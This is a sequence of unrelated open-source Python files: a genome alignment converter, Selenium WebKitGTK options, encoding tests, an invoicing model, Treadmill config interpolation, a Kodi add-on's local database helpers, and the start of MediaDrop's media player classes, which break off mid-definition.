SeqIO.parse(sequence, 'fasta'): label_convert[str(i + 1)] = record.id continue return label_convert def convert_xmfa_to_gff3(xmfa_file, relative_to='1', sequences=None, window_size=1000): label_convert = _id_tn_dict(sequences) lcbs = parse_xmfa(xmfa_file) records = [SeqRecord(Seq("A"), id=label_convert.get(relative_to, relative_to))] for lcb in lcbs: ids = [seq['id'] for seq in lcb] # Doesn't match part of our sequence if relative_to not in ids: continue # Skip sequences that are JUST our "relative_to" genome if len(ids) == 1: continue parent = [seq for seq in lcb if seq['id'] == relative_to][0] others = [seq for seq in lcb if seq['id'] != relative_to] for other in others: other['feature'] = SeqFeature( FeatureLocation(parent['start'], parent['end'] + 1), type="match", strand=parent['strand'], qualifiers={ "source": "progressiveMauve", "Target": " ".join(map(str, [label_convert.get(other['id'], other['id']), other['start'], other['end'], '+' if other['strand'] > 0 else '-'])), "ID": label_convert.get(other['id'], 'xmfa_' + other['rid']) } ) for i in range(0, len(lcb[0]['seq']), window_size): block_seq = parent['seq'][i:i + window_size] real_window_size = len(block_seq) real_start = abs(parent['start']) - parent['seq'][0:i].count('-') + i real_end = real_start + real_window_size - block_seq.count('-') if (real_end - real_start) < 10: continue if parent['start'] < 0: strand = -1 else: strand = 1 for other in others: pid = _percent_identity(block_seq, other['seq'][i:i + real_window_size]) # Ignore 0% identity sequences if pid == 0: continue # Support for Biopython 1.68 and 
above, which removed sub_features if not hasattr(other['feature'], "sub_features"): other['feature'].sub_features = [] other['feature'].sub_features.append( SeqFeature( FeatureLocation(real_start, real_end), type="match_part", strand=strand, qualifiers={ "source": "progressiveMauve", 'score': pid } ) ) for other in others: records[0].features.append(other['feature']) return records if __name__ == '__main__': parser = argparse.ArgumentParser(description='Convert XMFA alignments to gff3', prog='xmfa2gff3') parser.add_argument('xmfa_file', type=argparse.FileType('r'), help='XMFA File') parser.add_argument('--window_size', type=int, help='Window size for analysis', default=1000) parser.add_argument('--relative_to', type=str, help='Index of the parent sequence in the MSA', default='1') parser.add_argument('--sequences', type=argparse.FileType('r'), nargs='+', help='Fasta files (in same order) passed to parent for reconstructing proper IDs') parser.add_argument('--version', action='version', version='%(prog)s 1.0') args = parser.parse_args() result = convert_xmfa_to_gff3(**vars(args)) GFF.write(result, sys.stdout)
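# Programmatic use is also possible (a sketch; the file name and window size
# are illustrative):
#
#     with open('alignment.xmfa') as xmfa:
#         records = convert_xmfa_to_gff3(xmfa, relative_to='1', window_size=500)
#     GFF.write(records, sys.stdout)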
# Licensed to the Software Freedom Conservancy (SFC) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The SFC licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from selenium.webdriver.common.desired_capabilities import DesiredCapabilities class Options(object): KEY = 'webkitgtk:browserOptions' def __init__(self): self._binary_location = '' self._arguments = [] self._overlay_scrollbars_enabled = True @property def binary_location(self): """ Returns the location of the browser binary otherwise an empty string """ return self._binary_location @binary_location.setter def binary_location(self, value): """ Allows you to set the browser binary to launch :Args: - value : path to the browser binary """ self._binary_location = value @property def arguments(self): """ Returns a list of arguments needed for the browser """ return self._arguments def add_argument(self, argument): """ Adds an argument to the list :Args: - Sets the arguments """ if argument: self._arguments.append(argument) else: raise ValueError("argument can not be null") @property def overlay_scrollbars_enabled(self): """ Returns whether overlay scrollbars should be enabled """ return self._overlay_scrollbars_enabled @overlay_scrollbars_enabled.setter def overlay_scrollbars_enabled(self, value): """ Allows you to enable or disable overlay scrollbars :Args: - value : True or False """ self._overlay_scrollbars_enabled = value def to_capabilities(self): """ Creates a capabilities with all the options that have been set and returns a dictionary with everything """ webkitgtk = DesiredCapabilities.WEBKITGTK.copy() browser_options = {} if self.binary_location: browser_options["binary"] = self.binary_location if self.arguments: browser_options["args"] = self.arguments browser_options["useOverlayScrollbars"] = self.overlay_scrollbars_enabled webkitgtk[Options.KEY] = browser_options return webkitgtk
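# Usage sketch (the binary path and argument below are illustrative):
#
#     options = Options()
#     options.binary_location = '/usr/bin/MiniBrowser'
#     options.add_argument('--automation-mode')
#     options.overlay_scrollbars_enabled = False
#     caps = options.to_capabilities()
#     # caps['webkitgtk:browserOptions'] now carries 'binary', 'args' and
#     # 'useOverlayScrollbars' on top of the copied WEBKITGTK capabilities.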
from unittest import TestCase from mock import patch, MagicMock from jsoncfg.compatibility import python2 from jsoncfg.text_encoding import ( detect_encoding_and_remove_bom, decode_utf_text_buffer, load_utf_text_file ) class TestEncodingFunctions(TestCase): def test_detect_encoding_and_remove_bom(self): encoded_decoded_pairs = ( (b'\xef\xbb\xbfUTF', u'UTF'), (b'\xff\xfe\0\0U\0\0\0T\0\0\0F\0\0\0', u'UTF'), (b'\0\0\xfe\xff\0\0\0U\0\0\0T\0\0\0F', u'UTF'), (b'\xff\xfeU\0T\0F\0', u'UTF'), (b'\xfe\xff\0U\0T\0F', u'UTF'), (b'UTF', u'UTF'), ) for encoded, decoded in encoded_decoded_pairs: buf, encoding = detect_encoding_and_remove_bom(encoded) self.assertEqual(buf.decode(encoding), decoded) def test_detect_encoding_and_remove_bom_with_non_bytes_buf(self): self.assertRaisesRegexp(TypeError, r'buf should be a bytes instance but it is a', detect_encoding_and_remove_bom, u'non_bytes_buf') def test_decode_text_buffer(self): self.assertEqual(decode_utf_text_buffer(b'\xef\xbb\xbfUTF', use_utf8_strings=False), u'UTF') if python2: # Testing use_utf8_strings=True/False with buf=utf8/utf16. -> 4 cases. self.assertEqual(decode_utf_text_buffer(b'\xef\xbb\xbfUTF', use_utf8_strings=False), u'UTF') self.assertEqual(decode_utf_text_buffer(b'\xef\xbb\xbfUTF', use_utf8_strings=True), b'UTF') self.assertEqual(decode_utf_text_buffer(b'\xff\xfe\0\0U\0\0\0T\0\0\0F\0\0\0', use_utf8_strings=False), u'UTF') self.assertEqual(decode_utf_text_buffer(b'\xff\xfe\0\0U\0\0\0T\0\0\0F\0\0\0', use_utf8_strings=True), b'UTF') def test_load_utf_text_file_filename(self): with patch('jsoncfg.text_encoding.open', create=True) as mock_open: mock_file = MagicMock() mock_open.return_value.__enter__.return_value = mock_file mock_file.read.return_value = b'file_contents' text = load_utf_text_file('fake.txt', use_utf8_strings=False) self.assertEqual(text, u'file_contents') mock_open.assert_called_with('fake.txt', 'rb') mock_file.read.assert_called_with() def test_load_utf_text_file_fileobject(self): mock_file = MagicMock() mock_file.read.return_value = b'file_contents' text = load_utf_text_file(mock_file, use_utf8_strings=False) self.assertEqual(text, u'file_contents') mock_file.read.assert_called_with()
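# The helpers exercised above are typically used as in this sketch (the file
# name is illustrative):
#
#     text = load_utf_text_file('config.json', use_utf8_strings=False)
#     # Any UTF BOM is stripped and the remaining buffer is decoded to text.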
# Copyright (c) 2012-2015 Netforce Co. Ltd. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. from netforce.model import Model, fields, get_model class InvoiceLine(Model): _name = "account.invoice.line" _fields = { "invoice_id": fields.Many2One("account.invoice", "Invoice", required=True, on_delete="cascade"), "product_id": fields.Many2One("product", "Product"), "description": fields.Text("Description", required=True), "qty": fields.Decimal("Qty"), "uom_id": fields.Many2One("uom", "UoM"), "unit_price": fields.Decimal("Unit Price", scale=6), "discount": fields.Decimal("Disc %"), # XXX: rename to discount_percent later "discount_amount": fields.Decimal("Disc Amt"), "account_id": fields.Many2One("account.account", "Account", condition=[["type", "!=", "view"]]), "tax_id": fields.Many2One("account.tax.rate", "Tax Rate", on_delete="restrict"), "amount": fields.Decimal("Amount", required=True), "invoice_date": fields.Date("Invoice Date", function="_get_related", function_context={"path": "invoice_id.date"}), "invoice_contact_id": fields.Many2One("contact", "Invoice Partner", function="_get_related", function_context={"path": "invoice_id.contact_id"}), "purch_id": fields.Many2One("purchase.order", "Purchase Order"), "track_id": fields.Many2One("account.track.categ", "Track-1", condition=[["type", "=", "1"]]), "track2_id": fields.Many2One("account.track.categ", "Track-2", condition=[["type", "=", "2"]]), "amount_discount": fields.Decimal("Discount", function="get_discount"), "related_id": fields.Reference([["sale.order", "Sales Order"], ["purchase.order", "Purchase Order"], ["production.order","Production Order"], ["project", "Project"], ["job", "Service Order"], ["service.contract", "Service Contract"], ["work.time","Work Time"]], "Related To"), "sale_id": fields.Many2One("sale.order", "Sale Order"), "purchase_id": fields.Many2One("purchase.order","Purchase Order"), } def create(self, vals, **kw): id = super(InvoiceLine, self).create(vals, **kw) sale_id = vals.get("sale_id") if sale_id: get_model("sale.order").function_store([sale_id]) purch_id = vals.get("purch_id") if purch_id: get_model("purchase.order").function_store([purch_id]) return id def write(self, ids, vals, **kw): sale_ids = [] purch_ids = [] for obj in self.browse(ids): if obj.sale_id: sale_ids.append(obj.sale_id.id) if obj.purch_id: purch_ids.append(obj.purch_id.id) super(InvoiceLine, self).write(ids, vals, **kw) sale_id = vals.get("sale_id") if sale_id: sale_ids.append(sale_id) purch_id = vals.get("purch_id") if purch_id: 
purch_ids.append(purch_id) if sale_ids: get_model("sale.order").function_store(sale_ids) if purch_ids: get_model("purchase.order").function_store(purch_ids) def delete(self, ids, **kw): sale_ids = [] purch_ids = [] for obj in self.browse(ids): if obj.sale_id: sale_ids.append(obj.sale_id.id) if obj.purch_id: purch_ids.append(obj.purch_id.id) super(InvoiceLine, self).delete(ids, **kw) if sale_ids: get_model("sale.order").function_store(sale_ids) if purch_ids: get_model("purchase.order").function_store(purch_ids) def get_discount(self, ids, context={}): vals = {} for obj in self.browse(ids): amt = (obj.qty or 0) * (obj.unit_price or 0) if obj.discount: amt *= (1 - obj.discount / 100) if obj.discount_amount: amt -= obj.discount_amount vals[obj.id] = amt return vals InvoiceLine.register()
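# Worked example for get_discount(): with qty=10, unit_price=100, discount=5
# (percent) and discount_amount=20, the discounted amount is
# 10 * 100 * (1 - 0.05) - 20 = 930.
#
# Creating a line through this model also re-stores the function fields on any
# linked sale or purchase order, e.g. (field values and ids are illustrative):
#
#     get_model("account.invoice.line").create({
#         "invoice_id": 1,
#         "description": "Consulting",
#         "qty": 10,
#         "unit_price": 100,
#         "discount": 5,
#         "discount_amount": 20,
#         "amount": 930,
#         "sale_id": 1,
#     })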
"""Treadmill bootstrap module. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import logging import os import jinja2 import six from treadmill import utils _LOGGER = logging.getLogger(__name__) def render(value, params): """Renders text, interpolating params. """ return str(jinja2.Template(value).render(params)) def interpolate_service_conf(resource_path, service_conf, name, params): """Interpolates the service config. """ params['name'] = name new_service_conf = {'name': name} if 'command' not in service_conf: raise Exception( 'Service def did not include command: %s' % resource_path ) new_service_conf['command'] = _interpolate_scalar( service_conf.get('command'), params) monitor_policy = service_conf.get('monitor_policy', None) if monitor_policy is not None: monitor_policy = _interpolate_dict(monitor_policy, params) if 'tombstone' not in monitor_policy or \ 'path' not in monitor_policy['tombstone']: raise Exception( 'Service def ombstone path missing: %s' % resource_path ) tombstone_path = monitor_policy['tombstone']['path'] tombstone_path = _interpolate_scalar(tombstone_path, params) tombstone_id = monitor_policy['tombstone'].get('id', name) tombstone_id = _interpolate_scalar(tombstone_id, params) new_policy = { 'limit': int(monitor_policy.get('limit', 0)), 'interval': int(monitor_policy.get('interval', 60)), 'tombstone': { 'uds': False, 'path': tombstone_path, 'id': tombstone_id, 'no_exit_info': monitor_policy['tombstone'].get('no_exit_info', False) } } monitor_policy = new_policy new_service_conf['monitor_policy'] = monitor_policy new_service_conf['userid'] = _interpolate_scalar( service_conf.get('user', 'root'), params) new_service_conf['downed'] = service_conf.get('downed', False) new_service_conf['environ_dir'] = _interpolate_scalar( service_conf.get('environ_dir', None), params) new_service_conf['environ'] = _interpolate( service_conf.get('environ', None), params) new_service_conf['notification_fd'] = service_conf.get( 'notification_fd', None) new_service_conf['call_before_run'] = _interpolate(service_conf.get( 'call_before_run', None), params) new_service_conf['call_before_finish'] = _interpolate(service_conf.get( 'call_before_finish', None), params) new_service_conf['logger_args'] = service_conf.get('logger_args', None) files = [] data_dir = service_conf.get('data_dir', None) if data_dir is not None: for item in utils.get_iterable(data_dir): if 'path' not in item: continue file = { 'path': item['path'] } content = '' if 'content' in item: content = _interpolate_scalar(item['content'], params) file['content'] = content file['executable'] = item.get('executable', False) files.append(file) new_service_conf['data_dir'] = files del params['name'] _LOGGER.debug('Service config for %s: %r', name, new_service_conf) return new_service_conf def _interpolate_dict(value, params): """Recursively interpolate each value in parameters. """ result = {} target = dict(value) counter = 0 while counter < 100: counter += 1 result = { k: _interpolate(v, params) for k, v in six.iteritems(target) } if result == target: break target = dict(result) else: raise Exception('Too many recursions: %s %s' % (value, params)) return result def _interpolate_list(value, params): """Interpolate each of the list element. """ return [_interpolate(member, params) for member in value] def _interpolate_scalar(value, params): """Interpolate string value by rendering the template. 
""" if isinstance(value, six.string_types): return render(value, params) else: # Do not interpolate numbers. return value def _interpolate(value, params=None): """Interpolate the value, switching by the value type. """ if params is None: params = value try: if isinstance(value, list): return _interpolate_list(value, params) if isinstance(value, dict): return _interpolate_dict(value, params) return _interpolate_scalar(value, params) except Exception: _LOGGER.critical('error interpolating: %s %s', value, params) raise def interpolate(value, params=None): """Interpolate value. """ return _interpolate(value, params) __all__ = ['interpolate', 'interpolate_service_conf', 'render']
#!/usr/bin/python # -*- coding: utf-8 -*- try: from sqlite3 import dbapi2 as database except: from pysqlite2 import dbapi2 as database import xbmcvfs, os, sys, xbmc __PASTA_TRAKT__ = os.path.join(xbmc.translatePath('special://userdata/addon_data/plugin.video.mrpiracy/trakt/').decode('utf8')) __DB_FILE__ = os.path.join(xbmc.translatePath('special://userdata/addon_data/plugin.video.mrpiracy/').decode('utf8'), 'dadosv1.db') __PROGRESSO_FILE__ = os.path.join(__PASTA_TRAKT__, 'progresso.mrpiracy') __WATCH_FILMES_FILE__ = os.path.join(__PASTA_TRAKT__, 'watch_filmes.mrpiracy') __WATCH_SERIES_FILE__ = os.path.join(__PASTA_TRAKT__, 'watch_series.mrpiracy') __FILMES_FILE__ = os.path.join(__PASTA_TRAKT__, 'filmes.mrpiracy') __SERIES_FILE__ = os.path.join(__PASTA_TRAKT__, 'series.mrpiracy') def isExists(): if not xbmcvfs.exists(__DB_FILE__): createDB() return "DB criada com sucesso!" else: return "DB nao criada" def escrever_ficheiro(ficheiro, conteudo): f = open(ficheiro, mode="w") f.write(conteudo) f.close() def ler_ficheiro(ficheiro): f = open(ficheiro, "r") conteudo = f.read() f.close() return conteudo def criarFicheiros(): try: os.makedirs(__PASTA_TRAKT__) except: pass escrever_ficheiro(__PROGRESSO_FILE__, '') escrever_ficheiro(__WATCH_SERIES_FILE__, '') escrever_ficheiro(__WATCH_FILMES_FILE__, '') escrever_ficheiro(__SERIES_FILE__, '') escrever_ficheiro(__FILMES_FILE__, '') def createDB(): if not xbmcvfs.exists(__DB_FILE__): """f = open(__DB_FILE__, 'w') f.write('') f.close()""" con, dbcursor = connect() dbcursor.execute("CREATE TABLE IF NOT EXISTS trakt (id integer PRIMARY KEY NOT NULL, filmes text, series text, watchlistFilmes text, watchlistSeries text, progresso text, horas text);") """ dbcursor.execute("CREATE TABLE IF NOT EXISTS episodios (id integer PRIMARY KEY NOT NULL,nome text,plot text,categoria text,actores text,temporada text,episodio text,visto text DEFAULT('nao'),fanart text,poster text,imdb text,tvdb text,aired text,serienome text,traktid text);") dbcursor.execute("CREATE TABLE IF NOT EXISTS filmes (id integer PRIMARY KEY NOT NULL,imdb text,nome text,plot text,actores text,categoria text,visto text DEFAULT('nao'),fanart text,poster text,trailer text,ano text,traktid text,slug text);") dbcursor.execute("CREATE TABLE IF NOT EXISTS series (id integer PRIMARY KEY NOT NULL,nome text,plot text,imdb text,tvdb text,actores text,categoria text,visto text DEFAULT('nao'),fanart text,poster text,aired text,ano text,traktid text,slug text);") dbcursor.execute("CREATE TABLE IF NOT EXISTS temporadas (id integer PRIMARY KEY NOT NULL,imdb text,tvdb text,fanart text,temporada text,poster text);")""" con.commit() def connect(): conn = database.connect(__DB_FILE__) cursor = conn.cursor() conn.text_factory = str return conn, cursor def close(conn): conn.close() def insertTraktDB(filmes, series, watchlistFilmes, watchlistSeries, progresso, data): escrever_ficheiro(__PROGRESSO_FILE__, progresso) escrever_ficheiro(__WATCH_SERIES_FILE__, watchlistSeries) escrever_ficheiro(__WATCH_FILMES_FILE__, watchlistFilmes) escrever_ficheiro(__FILMES_FILE__, filmes) escrever_ficheiro(__SERIES_FILE__, series) def selectProgresso(): return ler_ficheiro(__PROGRESSO_FILE__) def selectWatchFilmes(): return ler_ficheiro(__WATCH_FILMES_FILE__) def selectWatchSeries(): return ler_ficheiro(__WATCH_SERIES_FILE__) def selectFilmes(): return ler_ficheiro(__FILMES_FILE__) def selectSeries(): return ler_ficheiro(__SERIES_FILE__) def insertTraktDB2(filmes, series, watchlistFilmes, watchlistSeries, progresso, data): con, dbcursor = 
connect() dbcursor.execute("INSERT OR REPLACE INTO trakt (id, filmes, series, watchlistFilmes, watchlistSeries, progresso, horas) VALUES (?, ?, ?, ?, ?, ?, ?)", (1, filmes, series, watchlistFilmes, watchlistSeries, progresso, data)) con.commit() def selectTraktDB(): con, dbcursor = connect() dbcursor.execute("SELECT * FROM trakt WHERE id=1") return dbcursor.fetchone() def insertFilmeDB(nome, plot, imdb, poster, fanart, trailer, ano, traktid, slug, categoria=None, actores=None): if categoria == None: categoria = '' if actores == None: actores = '' con, dbcursor = connect() dbcursor.execute("INSERT INTO filmes(imdb, nome, plot, categoria, actores, fanart, poster, trailer, ano, traktid, slug) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", (imdb, nome, plot, categoria, actores, fanart, poster, trailer, ano, traktid, slug)) con.commit() def selectFilmeDB(imdb): con, dbcursor = connect() dbcursor.execute("SELECT imdb, nome, plot, categoria, actores, fanart, poster, trailer, ano, visto, traktid, slug FROM filmes WHERE imdb=?", (imdb,)) return dbcursor.fetchone() def markwatchedFilmeDB(imdb, naoVisto=None): conn, dbcursor = connect() dbcursor.execute("SELECT visto FROM filmes WHERE imdb=?", (imdb,)) visto = dbcursor.fetchone() if visto[0] == "nao": dbcursor.execute("UPDATE filmes SET visto=? WHERE imdb=?", ("sim", imdb)) conn.commit() return True elif visto[0] == "sim": if naoVisto: dbcursor.execute("UPDATE filmes SET visto=? WHERE imdb=?", ("nao", imdb)) conn.commit() return True return False def isWatchedFilmeDB(imdb): conn, dbcursor = connect() dbcursor.execute("SELECT visto FROM filmes WHERE imdb=?", (imdb,)) visto = dbcursor.fetchone() if visto[0] == "nao": return False elif visto[0] == "sim": return True def insertSerie(nome, plot, imdb, tvdb, poster, fanart, aired, ano, traktid, slug, categoria=None, actores=None): if categoria == None: categoria = '' if actores == None: actores = '' con, dbcursor = connect() dbcursor.execute("INSERT INTO series(nome, plot, imdb, tvdb, actores, categoria, fanart, poster, aired, ano, traktid, slug) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", (nome, plot, imdb, tvdb, actores, categoria, fanart, poster, aired, ano, traktid, slug)) con.commit() def selectSerieDB(imdb): con, dbcursor = connect() dbcursor.execute("SELECT nome, plot, imdb, tvdb, actores, categoria, fanart, poster, aired, ano, traktid, slug FROM series WHERE imdb=?", (imdb,)) return dbcursor.fetchone() def getTVDBSerie(imdb): con, dbcursor = connect() dbcursor.execute("SELECT tvdb FROM series WHERE imdb=?", (imdb,)) return dbcursor.fetchone() def insertEpisodio(nome, plot, imdb, tvdb, temporada, episodio, fanart, poster, aired, serienome, traktid, categoria=None, actores=None): if categoria == None: categoria = '' if actores == None: actores = '' con, dbcursor = connect() dbcursor.execute("INSERT INTO episodios(nome, plot, temporada, episodio, fanart, poster, imdb, tvdb, aired, actores, categoria, serienome, traktid) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", (nome, plot, temporada, episodio, fanart, poster, imdb, tvdb, aired, actores, categoria, serienome, traktid)) con.commit() def selectEpisodioDB(imdb, temporada, episodio): con, dbcursor = connect() dbcursor.execute("SELECT nome, plot, temporada, episodio, fanart, poster, aired, actores, categoria, visto, imdb, serienome, traktid FROM episodios WHERE imdb=? AND temporada=? 
AND episodio=?", (imdb, temporada, episodio)) return dbcursor.fetchone() def selectTVDBEpisodioDB(imdb, temporada, episodio): conn, dbcursor = connect() dbcursor.execute("SELECT tvdb FROM episodios WHERE imdb=? AND temporada=? AND episodio=?", (imdb, temporada, episodio)) return dbcursor.fetchone() def markwatchedEpisodioDB(imdb, temporada, episodio, naoVisto=None): conn, dbcursor = connect() dbcursor.execute("SELECT visto FROM episodios WHERE imdb=? AND temporada=? AND episodio=?", (imdb, temporada, episodio)) visto = dbcursor.fetchone() if visto[0] == "nao": dbcursor.execute("UPDATE episodios SET visto=? WHERE imdb=? AND temporada=? AND episodio=?", ("sim", imdb, temporada, episodio)) conn.commit() return True elif visto[0] == "sim": if naoVisto: dbcursor.execute("UPDATE episodios SET visto=? WHERE imdb=? AND temporada=? AND episodio=?", ("nao", imdb, temporada, episodio)) conn.commit() return True return False def isWatchedSerieDB(imdb, temporada, episodio): conn, dbcursor = connect() dbcursor.execute("SELECT visto FROM episodios WHERE imdb=? AND temporada=? AND episodio=?", (imdb, temporada, episodio)) visto = dbcursor.fetchone() if visto[0] == "nao": return False elif visto[0] == "sim": return True def updateEpisodioDB(nome, plot, imdb, tvdb, temporada, episodio, fanart, poster, aired, serienome, traktid, categoria=None, actores=None): conn, dbcursor = connect() if categoria == None: categoria = '' if actores == None: actores = '' dbcursor.execute("DELETE FROM episodios WHERE imdb=? AND temporada=? AND episodio is NULL", (imdb, temporada)) #dbcursor.execute("UPDATE episodios SET nome=?, plot=?, tvdb=?, episodio=?, fanart=?, poster=?, aired=?, serienome=?, traktid=?, categoria=?, actores=? WHERE imdb=? AND temporada=?", (nome, plot, tvdb, episodio, fanart, poster, aired, serienome, traktid, categoria, actores, imdb, temporada)") conn.commit() insertEpisodio(nome, plot, imdb, tvdb, temporada, episodio, fanart, poster, aired, serienome, traktid, categoria, actores)
# This file is a part of MediaDrop (http://www.mediadrop.net), # Copyright 2009-2014 MediaDrop contributors # For the exact contribution history, see the git revision log. # The source code contained in this file is licensed under the GPLv3 or # (at your option) any later version. # See LICENSE.txt in the main project directory, for more information. from datetime import datetime from itertools import izip import logging from urllib import urlencode from genshi.builder import Element from genshi.core import Markup import simplejson from sqlalchemy import sql from mediadrop.forms.admin import players as player_forms from mediadrop.lib.compat import any from mediadrop.lib.filetypes import AUDIO, VIDEO, AUDIO_DESC, CAPTIONS from mediadrop.lib.i18n import N_ from mediadrop.lib.templating import render from mediadrop.lib.thumbnails import thumb_url from mediadrop.lib.uri import pick_uris from mediadrop.lib.util import url_for #from mediadrop.model.players import fetch_players XXX: Import at EOF from mediadrop.plugin.abc import AbstractClass, abstractmethod, abstractproperty log = logging.getLogger(__name__) HTTP, RTMP = 'http', 'rtmp' ############################################################################### class AbstractPlayer(AbstractClass): """ Player Base Class that all players must implement. """ name = abstractproperty() """A unicode string identifier for this class.""" display_name = abstractproperty() """A unicode display name for the class, to be used in the settings UI.""" settings_form_class = None """An optional :class:`mediadrop.forms.admin.players.PlayerPrefsForm`.""" default_data = {} """An optional default data dictionary for user preferences.""" supports_resizing = True """A flag that allows us to mark the few players that can't be resized. Setting this to False ensures that the resize (expand/shrink) controls will not be shown in our player control bar. """ @abstractmethod def can_play(cls, uris): """Test all the given URIs to see if they can be played by this player. This is a class method, not an instance or static method. :type uris: list :param uris: A collection of StorageURI tuples to test. :rtype: tuple :returns: Boolean result for each of the given URIs. """ def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. """ return error_text or u'' @abstractmethod def render_js_player(self): """Render a javascript string to instantiate a javascript player. Each player has a client-side component to provide a consistent way of initializing and interacting with the player. For more information see :file:`mediadrop/public/scripts/mcore/players/`. :rtype: ``unicode`` :returns: A javascript string which will evaluate to an instance of a JS player class. For example: ``new mcore.Html5Player()``. """ def __init__(self, media, uris, data=None, width=None, height=None, autoplay=False, autobuffer=False, qualified=False, **kwargs): """Initialize the player with the media that it will be playing. :type media: :class:`mediadrop.model.media.Media` instance :param media: The media object that will be rendered. :type uris: list :param uris: The StorageURIs this player has said it :meth:`can_play`. :type data: dict or None :param data: Optional player preferences from the database. 
:type elem_id: unicode, None, Default :param elem_id: The element ID to use when rendering. If left undefined, a sane default value is provided. Use None to disable. """ self.media = media self.uris = uris self.data = data or {} self.width = width or 400 self.height = height or 225 self.autoplay = autoplay self.autobuffer = autobuffer self.qualified = qualified self.elem_id = kwargs.pop('elem_id', '%s-player' % media.slug) _width_diff = 0 _height_diff = 0 @property def adjusted_width(self): """Return the desired viewable width + any extra for the player.""" return self.width + self._width_diff @property def adjusted_height(self): """Return the desired viewable height + the height of the controls.""" return self.height + self._height_diff def get_uris(self, **kwargs): """Return a subset of the :attr:`uris` for this player. This allows for easy filtering of URIs by feeding any number of kwargs to this function. See :func:`mediadrop.lib.uri.pick_uris`. """ return pick_uris(self.uris, **kwargs) @classmethod def inject_in_db(cls, enable_player=False): from mediadrop.model import DBSession from mediadrop.model.players import players as players_table, PlayerPrefs prefs = PlayerPrefs() prefs.name = cls.name prefs.enabled = enable_player # MySQL does not allow referencing the same table in a subquery # (i.e. insert, max): http://stackoverflow.com/a/14302701/138526 # Therefore we need to alias the table in max current_max_query = sql.select([sql.func.max(players_table.alias().c.priority)]) # sql.func.coalesce == "set default value if func.max does " # In case there are no players in the database the current max is NULL. With # coalesce we can set a default value. new_priority_query = sql.func.coalesce( current_max_query.as_scalar()+1, 1 ) prefs.priority = new_priority_query prefs.created_on = datetime.now() prefs.modified_on = datetime.now() prefs.data = cls.default_data DBSession.add(prefs) DBSession.commit() ############################################################################### class FileSupportMixin(object): """ Mixin that provides a can_play test on a number of common parameters. """ supported_containers = abstractproperty() supported_schemes = set([HTTP]) supported_types = set([AUDIO, VIDEO]) @classmethod def can_play(cls, uris): """Test all the given URIs to see if they can be played by this player. This is a class method, not an instance or static method. :type uris: list :param uris: A collection of StorageURI tuples to test. :rtype: tuple :returns: Boolean result for each of the given URIs. """ return tuple(uri.file.container in cls.supported_containers and uri.scheme in cls.supported_schemes and uri.file.type in cls.supported_types for uri in uris) class FlashRenderMixin(object): """ Mixin for rendering flash players. Used by embedtypes as well as flash. 
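    Subclasses supply swf_url() and flashvars(); render_object() and
    render_embed() then build the corresponding markup, roughly as in this
    sketch (the SWF URL is illustrative):

        <object type="application/x-shockwave-flash" data="player.swf" ...>
          <param name="movie" value="player.swf" />
          <param name="flashvars" value="..." />
        </object>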
""" def render_object_embed(self, error_text=None): object_tag = self.render_object() orig_id = self.elem_id self.elem_id = None embed_tag = self.render_embed(error_text) self.elem_id = orig_id return object_tag(embed_tag) def render_embed(self, error_text=None): swf_url = self.swf_url() flashvars = urlencode(self.flashvars()) tag = Element('embed', type='application/x-shockwave-flash', allowfullscreen='true', allowscriptaccess='always', width=self.adjusted_width, height=self.adjusted_height, src=swf_url, flashvars=flashvars, id=self.elem_id) if error_text: tag(error_text) return tag def render_object(self, error_text=None): swf_url = self.swf_url() flashvars = urlencode(self.flashvars()) tag = Element('object', type='application/x-shockwave-flash', width=self.adjusted_width, height=self.adjusted_height, data=swf_url, id=self.elem_id) tag(Element('param', name='movie', value=swf_url)) tag(Element('param', name='flashvars', value=flashvars)) tag(Element('param', name='allowfullscreen', value='true')) tag(Element('param', name='allowscriptaccess', value='always')) if error_text: tag(error_text) return tag def render_js_player(self): """Render a javascript string to instantiate a javascript player. Each player has a client-side component to provide a consistent way of initializing and interacting with the player. For more information see ``mediadrop/public/scripts/mcore/players/``. :rtype: ``unicode`` :returns: A javascript string which will evaluate to an instance of a JS player class. For example: ``new mcore.Html5Player()``. """ return Markup("new mcore.FlashPlayer('%s', %d, %d, %s)" % ( self.swf_url(), self.adjusted_width, self.adjusted_height, simplejson.dumps(self.flashvars()), )) ############################################################################### class AbstractFlashPlayer(FileSupportMixin, FlashRenderMixin, AbstractPlayer): """ Base Class for standard Flash Players. This does not typically include flash players from other vendors such as embed types. """ supported_containers = set(['mp3', 'mp4', 'flv', 'f4v', 'flac']) @abstractmethod def flashvars(self): """Return a python dict of flashvars for this player.""" @abstractmethod def swf_url(self): """Return the flash player URL.""" class AbstractRTMPFlashPlayer(AbstractFlashPlayer): """ Dummy Base Class for Flash Players that can stream over RTMP. """ supported_schemes = set([HTTP, RTMP]) class 